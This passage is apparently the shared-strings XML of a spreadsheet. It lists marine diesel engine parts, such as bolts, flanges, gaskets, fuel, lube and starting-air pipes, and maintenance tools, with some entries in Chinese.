    <t>3472-0250 CONTROL AIR SYSTEM</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SPECIAL, HEXAGON HEAD</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>6670-0100 TOOLS FOR SPEC.RUNNING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SCR CONNECTION</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5779971-0.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>6645-0160 PREP AFTER ARR IN PORT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>6655-0135 MOP EVENT LOG</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PLUG SCREWS, BLANKING ENDS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>Alignment of Reciprocating Parts, Operation</t>
  </si>
  <si>
    <t>SOFTWARE/HARDWARE ID KEY</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0950 PCBA</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">6645-0160 </t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EMS SOFTWARE &amp;amp; PARAMETERS</t>
  </si>
  <si>
    <t>INCOMPLETE_21-4732.0</t>
  </si>
  <si>
    <t>BLOCK CLAMPS, ALUMINIUM</t>
  </si>
  <si>
    <t>EN227EL10012.0</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE (MAIN)</t>
  </si>
  <si>
    <t>INCOMPLETE_21-3030.0</t>
  </si>
  <si>
    <t>CYL. WEAR MEAS. TOOL, OPTIONAL</t>
  </si>
  <si>
    <t>5323469-5.1</t>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECT, OPTIONAL</t>
  </si>
  <si>
    <t>5556568-9.5</t>
  </si>
  <si>
    <t>1070-1035 CRANKSHAFT DEFLECT TOO</t>
  </si>
  <si>
    <t>1070-1035-0001.0</t>
  </si>
  <si>
    <t>CRANKSHAFT DEFLECT TOOLS</t>
  </si>
  <si>
    <t>P90575-0001.1</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, MAIN BEARING CAP</t>
  </si>
  <si>
    <t>5197700-5.2</t>
  </si>
  <si>
    <t>STEEL PIPE, EXT. DIA. 200-250</t>
  </si>
  <si>
    <t>5103373-2.0</t>
  </si>
  <si>
    <t>DISC, EDGED WITH HOLES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>Hexagon nut M10</t>
  </si>
  <si>
    <t>Hexagon nut M12</t>
  </si>
  <si>
    <t>Hexagon nut M16</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UR</t>
  </si>
  <si>
    <t>Bolt M10 X 25</t>
  </si>
  <si>
    <t>Spring washer M16</t>
  </si>
  <si>
    <t>O-ring G75</t>
  </si>
  <si>
    <t>Bolt M8×15</t>
  </si>
  <si>
    <t>Bolt M10×35</t>
  </si>
  <si>
    <t>Bolt M12×30</t>
  </si>
  <si>
    <t>Bolt M16×40</t>
  </si>
  <si>
    <t>Bolt M12×40</t>
  </si>
  <si>
    <t>Bolt M16×45</t>
  </si>
  <si>
    <t>Flange 5K-25A</t>
  </si>
  <si>
    <t>Rigging conn.pipe of starting air</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe M20×1.5×20</t>
  </si>
  <si>
    <t>Housing for non-return valve</t>
  </si>
  <si>
    <t>Hexagon socket head cap screw M16×110</t>
  </si>
  <si>
    <t>Plate　60×ｔ9×100</t>
  </si>
  <si>
    <t>Copper gasket 20.5×26×1</t>
  </si>
  <si>
    <t>U-bolt 50A</t>
  </si>
  <si>
    <t>Bolt M12×35</t>
  </si>
  <si>
    <t>Copper gasket φ95×φ55×ｔ1</t>
  </si>
  <si>
    <t>Inlet main pipe of starting air（1/2～2/2）</t>
  </si>
  <si>
    <t>90°steel pipe butt-welding fitting 50A S40</t>
  </si>
  <si>
    <t>Slip-on welding type flange 30k-50</t>
  </si>
  <si>
    <t>Slip-on welding type flange 30k-20</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe PF3/8×20</t>
  </si>
  <si>
    <t>30K slip-on welding type flange</t>
  </si>
  <si>
    <t>Flange for 30K-32</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe M27×2×25</t>
  </si>
  <si>
    <t>Assembly of rupture disk</t>
  </si>
  <si>
    <t>Spectacle flange</t>
  </si>
  <si>
    <t>Rupture disk cover</t>
  </si>
  <si>
    <t>Support for autmatic starting air stop valve</t>
  </si>
  <si>
    <t>Plate 65×ｔ12×160</t>
  </si>
  <si>
    <t>Plate 75×ｔ9×174</t>
  </si>
  <si>
    <t>Bolt M16×65</t>
  </si>
  <si>
    <t>Bolt M16×30</t>
  </si>
  <si>
    <t>Plug M27×2</t>
  </si>
  <si>
    <t>U-bolt 100A</t>
  </si>
  <si>
    <t>Spring washer M8</t>
  </si>
  <si>
    <t>Gasket with inner&amp;outer ring 30K-50</t>
  </si>
  <si>
    <t>Copper gasket 28×37.5×1</t>
  </si>
  <si>
    <t>30K-50 blind flange</t>
  </si>
  <si>
    <t>Inlet branch pipe of starting air(1/2～2/2)</t>
  </si>
  <si>
    <t>Flange for 30ｋ</t>
  </si>
  <si>
    <t>Plate 110×ｔ12×150</t>
  </si>
  <si>
    <t>Plate 32×ｔ6×120</t>
  </si>
  <si>
    <t>Bolt M16×130</t>
  </si>
  <si>
    <t>Bolt M16×70</t>
  </si>
  <si>
    <t>U-bolt 32A</t>
  </si>
  <si>
    <t>U-bolt 25A</t>
  </si>
  <si>
    <t>U-bolt 15A</t>
  </si>
  <si>
    <t>U-bolt 10A</t>
  </si>
  <si>
    <t>Gasket with inner&amp;outer ring 30K-32</t>
  </si>
  <si>
    <t>O-ring P56</t>
  </si>
  <si>
    <t>O-ring G80</t>
  </si>
  <si>
    <t>Inlet drain pipe of starting air(1/2～2/2)</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×780.1</t>
  </si>
  <si>
    <t>Bite type fittings (for steel pipe use)LLM-UP-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fittings (for steel pipe use)LLM-U-3/8</t>
  </si>
  <si>
    <t>Bite type fitting (for steel pipe use)LLM-UP-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fitting (for steel pipe use)LLM-UR-3/8×3/8</t>
  </si>
  <si>
    <t>Orifice φ3</t>
  </si>
  <si>
    <t>Pipe 10A×Sch40×1602.3mm</t>
  </si>
  <si>
    <t>Pipe 10A×sch40×1101.1</t>
  </si>
  <si>
    <t>Pipe 10A×sch40×2431.5</t>
  </si>
  <si>
    <t>Plate 95×50×ｔ9</t>
  </si>
  <si>
    <t>Plate 80×50×ｔ9</t>
  </si>
  <si>
    <t>Pipe support (B type) 10A×1</t>
  </si>
  <si>
    <t>Pipe support (A type) 10A×1</t>
  </si>
  <si>
    <t>Pipe support (A type) 10A×2</t>
  </si>
  <si>
    <t>Bolt M12×20</t>
  </si>
  <si>
    <t>Cross recessed pan head screw M6×8</t>
  </si>
  <si>
    <t>Copper gasket 17×28×1</t>
  </si>
  <si>
    <t>Needle valve 20k-10Ａ</t>
  </si>
  <si>
    <t>Pipe manufacturing procedure</t>
  </si>
  <si>
    <t>Inlet pipe of fuel oil 1/2</t>
  </si>
  <si>
    <t>Inlet pipe of fuel oil 2/2</t>
  </si>
  <si>
    <t>Pipe 40AxSch40x3866L</t>
  </si>
  <si>
    <t>Flange 16K-40</t>
  </si>
  <si>
    <t>Special flange 20K-40A</t>
  </si>
  <si>
    <t>Special flange 15A</t>
  </si>
  <si>
    <t>Reinforcement plate</t>
  </si>
  <si>
    <t>Boss G3/4x105</t>
  </si>
  <si>
    <t>Boss M20x1.5x20</t>
  </si>
  <si>
    <t>Boss PF3/4x25</t>
  </si>
  <si>
    <t>Pipe 40AxSch40x482.5L</t>
  </si>
  <si>
    <t>Pipe 40AxSch40x478L</t>
  </si>
  <si>
    <t>Flange 20K-40A</t>
  </si>
  <si>
    <t>F.O damper</t>
  </si>
  <si>
    <t>Stop bolt</t>
  </si>
  <si>
    <t>Stud bolt M12x70</t>
  </si>
  <si>
    <t>Nut M12</t>
  </si>
  <si>
    <t>Copper gasket φ20.5xφ26x1</t>
  </si>
  <si>
    <t>Support H100x100x6x8-305L</t>
  </si>
  <si>
    <t>Support H175x90x5x8-305L</t>
  </si>
  <si>
    <t>Support L75x75x6-506.3L</t>
  </si>
  <si>
    <t>Gasket 16K-40</t>
  </si>
  <si>
    <t>O-ring G100</t>
  </si>
  <si>
    <t>Bolt M16x50</t>
  </si>
  <si>
    <t>Nut M16</t>
  </si>
  <si>
    <t>Bolt M12x55</t>
  </si>
  <si>
    <t>Bolt M16x120</t>
  </si>
  <si>
    <t>Bolt M16x40</t>
  </si>
  <si>
    <t>Plug PF3/4</t>
  </si>
  <si>
    <t>Plug M20x1.5</t>
  </si>
  <si>
    <t>Copper gasket 27x32x1</t>
  </si>
  <si>
    <t>Copper gasket 20.5x26x1</t>
  </si>
  <si>
    <t>Outlet pipe of fuel oil 1/2</t>
  </si>
  <si>
    <t>Outlet pipe of fuel oil 2/2</t>
  </si>
  <si>
    <t>Pipe 40AxSch40x643L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x561L</t>
  </si>
  <si>
    <t>Flange 16K-15</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x444L</t>
  </si>
  <si>
    <t>Fuel oil shut-off valve</t>
  </si>
  <si>
    <t>Bolt M12x40</t>
  </si>
  <si>
    <t>Pipe 20Ax2963L</t>
  </si>
  <si>
    <t>Pipe 20Ax68L</t>
  </si>
  <si>
    <t>Pipe 20Ax65.4L</t>
  </si>
  <si>
    <t>Boss A-type G3/8x20L</t>
  </si>
  <si>
    <t>Bite type fittings (for steel pipe) LLA-UE-3/4x3/4</t>
  </si>
  <si>
    <t>Boss B-type M20×1.5×40L</t>
  </si>
  <si>
    <t>Pipe 20Ax1012.2L</t>
  </si>
  <si>
    <t>Flange 5K-20</t>
  </si>
  <si>
    <t>Plate 90x55xt9</t>
  </si>
  <si>
    <t>Bolt M12x30</t>
  </si>
  <si>
    <t>Bolt M12x20</t>
  </si>
  <si>
    <t>Bite type fittings  LLM-U-3/4</t>
  </si>
  <si>
    <t>U-Bolt 20A</t>
  </si>
  <si>
    <t>Nut M10</t>
  </si>
  <si>
    <t>Copper gasket 21.5×26×t1</t>
  </si>
  <si>
    <t>Pipe 10Ax1216L</t>
  </si>
  <si>
    <t>Bite type fittings (for Steel pipe use) LLA-UR-3/8x1/2</t>
  </si>
  <si>
    <t>Bite type fitting (for Steel pipe use) LLA-UR-3/8x3/8</t>
  </si>
  <si>
    <t>Pipe 10Ax1209L</t>
  </si>
  <si>
    <t>Bite type fitting (for Steel pipe use) LLA-UR-3/8x1/2</t>
  </si>
  <si>
    <t>Pipe 10Ax1191L</t>
  </si>
  <si>
    <t>Bite type fitting (for Steel pipe) LLA-UE-3/8x1/2</t>
  </si>
  <si>
    <t>Plate 50xt9xx90</t>
  </si>
  <si>
    <t>Plate 152x80x6</t>
  </si>
  <si>
    <t>Copper gasket 21.5x26x1</t>
  </si>
  <si>
    <t>Copper gasket 17x21x1</t>
  </si>
  <si>
    <t>U-Bolt 65A</t>
  </si>
  <si>
    <t>Drain main pipe of protective pipe</t>
  </si>
  <si>
    <t>Pipe 20Ax2687L</t>
  </si>
  <si>
    <t>Pipe 20Ax177L</t>
  </si>
  <si>
    <t>Boss PF3/8x20</t>
  </si>
  <si>
    <t>Pipe 20Ax512</t>
  </si>
  <si>
    <t>Pipe 20Ax1075.7</t>
  </si>
  <si>
    <t>Full-face gasket 5K-20</t>
  </si>
  <si>
    <t>Bolt M10x35</t>
  </si>
  <si>
    <t>Bolt M12x25</t>
  </si>
  <si>
    <t>Flange assembly</t>
  </si>
  <si>
    <t>Special U-bolt</t>
  </si>
  <si>
    <t>Drain branch pipe of protective pipe</t>
  </si>
  <si>
    <t>Pipe 6Ax742L</t>
  </si>
  <si>
    <t>Bite type fittings (for Steel pipe use) LLA-UR-1/8x3/8</t>
  </si>
  <si>
    <t>Pipe 6Ax656L</t>
  </si>
  <si>
    <t>Pipe 6Ax756L</t>
  </si>
  <si>
    <t>Drain main pipe of fuel valve （1/2～2/2）</t>
  </si>
  <si>
    <t>Drain main pipe of fuel valve</t>
  </si>
  <si>
    <t>Pipe 20Ax543</t>
  </si>
  <si>
    <t>Pipe end welding boss M36x2</t>
  </si>
  <si>
    <t>Plugs M36x2</t>
  </si>
  <si>
    <t>Copper gasket 36.5x49.5x1</t>
  </si>
  <si>
    <t>Pipe 20Ax2973</t>
  </si>
  <si>
    <t>Bite type fittings (for steel pipe) LLM-T-3/4</t>
  </si>
  <si>
    <t>Drain conn. pipe of fuel valve （1/2～2/2）</t>
  </si>
  <si>
    <t>Pipe 20Ax1250.8</t>
  </si>
  <si>
    <t>Bite type fittings (for steel pipe use) LLM-U-3/4</t>
  </si>
  <si>
    <t>Drain conn. pipe of fuel valve 20Ax873L</t>
  </si>
  <si>
    <t>Pipe Supports (B-Type)</t>
  </si>
  <si>
    <t>Hexagon head bolts M8x20</t>
  </si>
  <si>
    <t>Pipe 10AxSch40x1198.1mm</t>
  </si>
  <si>
    <t>Bite type fittings (for Steel pipe use) LLM-UR-3/8x3/8</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 x 70.7L</t>
  </si>
  <si>
    <t>Terminal pipe joint 6A</t>
  </si>
  <si>
    <t>Terminal 6A</t>
  </si>
  <si>
    <t>Terminal bolt 6A</t>
  </si>
  <si>
    <t>Copper gasket φ13.5xφ17x1</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 x 726.8L</t>
  </si>
  <si>
    <t>Bite type fitting LLM - E - 1/8</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 x 626L</t>
  </si>
  <si>
    <t>Pipe 50Ax130mm</t>
  </si>
  <si>
    <t>Plate φ57xt1.6</t>
  </si>
  <si>
    <t>Plate φ66xt1.6</t>
  </si>
  <si>
    <t>Wire φ2x70</t>
  </si>
  <si>
    <t>Plate φ52.5xt4.5</t>
  </si>
  <si>
    <t>Bolt M10x20</t>
  </si>
  <si>
    <t>Bolt M8x15</t>
  </si>
  <si>
    <t>Nut M8</t>
  </si>
  <si>
    <t>Drain pipe of driv. end of fuel oil damper</t>
  </si>
  <si>
    <t>Pipe 10A×abt.1446L</t>
  </si>
  <si>
    <t>Pipe 6A×abt.1030L</t>
  </si>
  <si>
    <t>Pipe 6A×abt.1196L</t>
  </si>
  <si>
    <t>Pipe 6A×abt.110L</t>
  </si>
  <si>
    <t>Pipe 6A×abt.153L</t>
  </si>
  <si>
    <t>Pipe 50Ax80L</t>
  </si>
  <si>
    <t>Upper plate t1.6</t>
  </si>
  <si>
    <t>Cover t1.6</t>
  </si>
  <si>
    <t>Lower plate φ52.5×ｔ4.5</t>
  </si>
  <si>
    <t>Boss　Type：A　G3/8</t>
  </si>
  <si>
    <t>Plate 75×t12×110</t>
  </si>
  <si>
    <t>Boss G3/4x10A</t>
  </si>
  <si>
    <t>Screw joint for F.O. damper</t>
  </si>
  <si>
    <t>Bite type fittings LLM-UR-3/8x3/8</t>
  </si>
  <si>
    <t>Bite type fittings LLM-UR-1/8x3/8</t>
  </si>
  <si>
    <t>Valve LLM-VU-1/8×1/8</t>
  </si>
  <si>
    <t>Copper gasket 22x28x1</t>
  </si>
  <si>
    <t>Support　Type：A　10.5×1</t>
  </si>
  <si>
    <t>Plate 10Ax1</t>
  </si>
  <si>
    <t>Support　Type：B　18×1</t>
  </si>
  <si>
    <t>Plate 10x2</t>
  </si>
  <si>
    <t>Support　Type：B　10×2</t>
  </si>
  <si>
    <t>Bolt M6x10</t>
  </si>
  <si>
    <t>Sleeve holder</t>
  </si>
  <si>
    <t>Union nut φ50.6x58</t>
  </si>
  <si>
    <t>Bracing piece</t>
  </si>
  <si>
    <t>Union nut φ50.6x65</t>
  </si>
  <si>
    <t>Union nut hexagon 55x52</t>
  </si>
  <si>
    <t>Pipe 80AxSch40x177</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe PF3/8x20</t>
  </si>
  <si>
    <t>Sleeve 50AxSch80x100</t>
  </si>
  <si>
    <t>Pipe 50AxSch80x74</t>
  </si>
  <si>
    <t>Plate 65xt16x110</t>
  </si>
  <si>
    <t>Plate 119xt12x135</t>
  </si>
  <si>
    <t>Plate φ150xt16</t>
  </si>
  <si>
    <t>Plate 50xt6x50</t>
  </si>
  <si>
    <t>Plate 50xt6x91</t>
  </si>
  <si>
    <t>Plate 30xt6x30</t>
  </si>
  <si>
    <t>O-ring P45</t>
  </si>
  <si>
    <t>Bolt M16 x 75</t>
  </si>
  <si>
    <t>Bolt M8 x 15</t>
  </si>
  <si>
    <t>Retaining ring of shaft 50</t>
  </si>
  <si>
    <t>Pipe arrangement for rigging conn. pipe of lube oil</t>
  </si>
  <si>
    <t>Pipe assemby</t>
  </si>
  <si>
    <t>Flange 5K-125A</t>
  </si>
  <si>
    <t>Boss A-type M20x1.5x20L</t>
  </si>
  <si>
    <t>Boss A-type M24x2x25L</t>
  </si>
  <si>
    <t>45°Elbow(S) 125A GS</t>
  </si>
  <si>
    <t>Boss 32A</t>
  </si>
  <si>
    <t>Pipe 125A×936.9L</t>
  </si>
  <si>
    <t>Pipe 125A×83.1L</t>
  </si>
  <si>
    <t>Pipe assembly for rigging conn. pipe of lube oil</t>
  </si>
  <si>
    <t>Boss A-type G3/4x25L</t>
  </si>
  <si>
    <t>Pipe 125A×336.5L</t>
  </si>
  <si>
    <t>Plate 200x75xt12</t>
  </si>
  <si>
    <t>Plate 204x120xt16</t>
  </si>
  <si>
    <t>Plate 204x120xt12</t>
  </si>
  <si>
    <t>Plate 175x124xt12</t>
  </si>
  <si>
    <t>Bolt M16×50</t>
  </si>
  <si>
    <t>U-bolt 125A</t>
  </si>
  <si>
    <t>Full-face gasket 5K-125A</t>
  </si>
  <si>
    <t>Pipe asembly</t>
  </si>
  <si>
    <t>Flange 5K-40A</t>
  </si>
  <si>
    <t>90°Elbow(S) 125A GS</t>
  </si>
  <si>
    <t>Pipe 125A×128.5L</t>
  </si>
  <si>
    <t>Pipe 40A×79.5L</t>
  </si>
  <si>
    <t>Copper gasket 20.5x26xt1</t>
  </si>
  <si>
    <t>Copper gasket 27x32xt1</t>
  </si>
  <si>
    <t>Plug M24x2</t>
  </si>
  <si>
    <t>Plug G3/4</t>
  </si>
  <si>
    <t>Inlet main pipe of piston cooling lube oil</t>
  </si>
  <si>
    <t>Boss 40A</t>
  </si>
  <si>
    <t>Pipe 125A×3945.0L</t>
  </si>
  <si>
    <t>Pipe 40A×59.5L</t>
  </si>
  <si>
    <t>Pipe 25A×56.7L</t>
  </si>
  <si>
    <t>Plate 320x185xt12</t>
  </si>
  <si>
    <t>Plate 150x100xt16</t>
  </si>
  <si>
    <t>Plate 210x65xt12</t>
  </si>
  <si>
    <t xml:space="preserve">U bolt 125A </t>
  </si>
  <si>
    <t>Full-face gasket 5K-40A</t>
  </si>
  <si>
    <t>Pipe 40A×259.8L</t>
  </si>
  <si>
    <t>Special gasket</t>
  </si>
  <si>
    <t>Inlet branch pipe of main bearing lube oil（For middle）</t>
  </si>
  <si>
    <t>Inlet branch pipe of main bearing lube oil（For middle)</t>
  </si>
  <si>
    <t>Pipe 20A×1152.8L</t>
  </si>
  <si>
    <t>Bite type fitting LLM-U-3/4</t>
  </si>
  <si>
    <t>Pipe 20A×1908.4L</t>
  </si>
  <si>
    <t>5K-20A Flange</t>
  </si>
  <si>
    <t>Pipe 20A×166.2L</t>
  </si>
  <si>
    <t>Pipe 20A×497.9L</t>
  </si>
  <si>
    <t>Pipe 20A×57.4L</t>
  </si>
  <si>
    <t>T-piece 1/2</t>
  </si>
  <si>
    <t>Flanges 5K-20A</t>
  </si>
  <si>
    <t>Boss M14×1.5</t>
  </si>
  <si>
    <t>Pipe 20A×652.6L</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-3/4×3/4</t>
  </si>
  <si>
    <t>Plug M14×1.5</t>
  </si>
  <si>
    <t>Pipe support B-type 28×1</t>
  </si>
  <si>
    <t>Bolt M10×25</t>
  </si>
  <si>
    <t>Bolt M12×15</t>
  </si>
  <si>
    <t>U-nut M10</t>
  </si>
  <si>
    <t>5K-20 gasket</t>
  </si>
  <si>
    <t>Copper gasket 27×37×1</t>
  </si>
  <si>
    <t>Copper gasket 14.5×19.5×1</t>
  </si>
  <si>
    <t>Locking plate B M10×20×32</t>
  </si>
  <si>
    <t>Locking plate B M12×20×35</t>
  </si>
  <si>
    <t>Wire φ2×200L</t>
  </si>
  <si>
    <t>Wire φ2×800L</t>
  </si>
  <si>
    <t>Pipe arrangement Connecting pipe of axial vib. damper lube oil</t>
  </si>
  <si>
    <t>Full-face gasket 5K-32A</t>
  </si>
  <si>
    <t>Copper gasket 33.5x40xt1</t>
  </si>
  <si>
    <t>Check valve of axial vib. damper</t>
  </si>
  <si>
    <t>Flange 5K-32A</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-U-3/4</t>
  </si>
  <si>
    <t>Plate 100x60xt9</t>
  </si>
  <si>
    <t>Bolt M12×25</t>
  </si>
  <si>
    <t>Bolt M12×45</t>
  </si>
  <si>
    <t xml:space="preserve">U bolt 32A </t>
  </si>
  <si>
    <t>Drain pipe of ditch of bed plate(1/2～2/2）</t>
  </si>
  <si>
    <t>Pipe 6A×100</t>
  </si>
  <si>
    <t>Copper gaskets 22×28×1</t>
  </si>
  <si>
    <t>Screwed cocks 16K-6_B-S</t>
  </si>
  <si>
    <t>Inlet branch pipe of main bearing lube oil（For driving end）（1/2～2/2）</t>
  </si>
  <si>
    <t>Inlet branch pipe driving end of main bearing lube oil</t>
  </si>
  <si>
    <t>90° steel pipe butt-welding fittingｓ 40A G.S</t>
  </si>
  <si>
    <t>Eccentric reducer 40Ax20A</t>
  </si>
  <si>
    <t>Steel Pipe socket Welding Flange 5K-40</t>
  </si>
  <si>
    <t>Reducer 40A×20A G.S</t>
  </si>
  <si>
    <t>Nozzle　φ27×30</t>
  </si>
  <si>
    <t>Inlet branch pipe of main bearing lube oil（For driving end)</t>
  </si>
  <si>
    <t>Steel pipe socket welding flange 5K-20</t>
  </si>
  <si>
    <t>Boss　M14×1.5</t>
  </si>
  <si>
    <t>Boss　M14× 1.5</t>
  </si>
  <si>
    <t>90° steel pipe butt welding fitting 40A G.S</t>
  </si>
  <si>
    <t>Plate 25×ｔ4.5×199</t>
  </si>
  <si>
    <t>Plate 60×ｔ9×90</t>
  </si>
  <si>
    <t>Plug　M14×1.5</t>
  </si>
  <si>
    <t>U-bolt 40A</t>
  </si>
  <si>
    <t>Copper gaskets 14.5×19.5×1</t>
  </si>
  <si>
    <t>Full-face gasket 5K-40</t>
  </si>
  <si>
    <t>Square gasket 65×65×ｔ1.5</t>
  </si>
  <si>
    <t>Locking plate B M12×25×35</t>
  </si>
  <si>
    <t>Bolt M10×40</t>
  </si>
  <si>
    <t>Orifice（40A φ16.5）</t>
  </si>
  <si>
    <t>Plate 120×ｔ10×140</t>
  </si>
  <si>
    <t>Plate 130×25×t16</t>
  </si>
  <si>
    <t>Lubricating pipe of camshaft driv.assembly(1/2～2/2）</t>
  </si>
  <si>
    <t>Lubricating pipe of camshaft driv.assembly</t>
  </si>
  <si>
    <t>90° steel pipe butt-welding fittingｓ 50A G.S</t>
  </si>
  <si>
    <t>Steel pipe socket welding flange 5K-50</t>
  </si>
  <si>
    <t>Lubricating pipe of camshaft driv.</t>
  </si>
  <si>
    <t>Full-face gasket 5K-50</t>
  </si>
  <si>
    <t>Attachment boss for steel pipe G1/8×15</t>
  </si>
  <si>
    <t>90° steel pipe butt-welding fittings 50A G.S</t>
  </si>
  <si>
    <t>Flange 5K-125-50A</t>
  </si>
  <si>
    <t>Plate φ235×ｔ16</t>
  </si>
  <si>
    <t>Bite type fittings （for steel pipe use）LLM-UR-1/8×3/8</t>
  </si>
  <si>
    <t>Bite Type Fittings （For Steel Pipe Use）LLM-UR-6×1/8</t>
  </si>
  <si>
    <t>Flange 5K-20-10A</t>
  </si>
  <si>
    <t>Bite type fittings （for steel pipe use）LLM-UR-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fittings （for steel pipe use）LLM-UR-3/4×3/4</t>
  </si>
  <si>
    <t>Reducer bite type connector （for steel pipe）</t>
  </si>
  <si>
    <t>Plate 32×ｔ4.5×130</t>
  </si>
  <si>
    <t>Pipe support（B type）18×1</t>
  </si>
  <si>
    <t>Tube support A-type 10.5×1</t>
  </si>
  <si>
    <t>Pipe suport 3.2×25×42</t>
  </si>
  <si>
    <t>Copper gaskets 17×21×1</t>
  </si>
  <si>
    <t>Gasket 3.4</t>
  </si>
  <si>
    <t>Bolt M8×20</t>
  </si>
  <si>
    <t>Cross recessed pan head M6×10</t>
  </si>
  <si>
    <t>Hexagon nut M8</t>
  </si>
  <si>
    <r>
      <t>1" 3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> V1-V2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1#</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸停缸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1/2"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检修气缸单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1+2+3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸用排气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1040-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>结构件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱防爆门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱防爆门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1065-0400 </t>
    </r>
    <r>
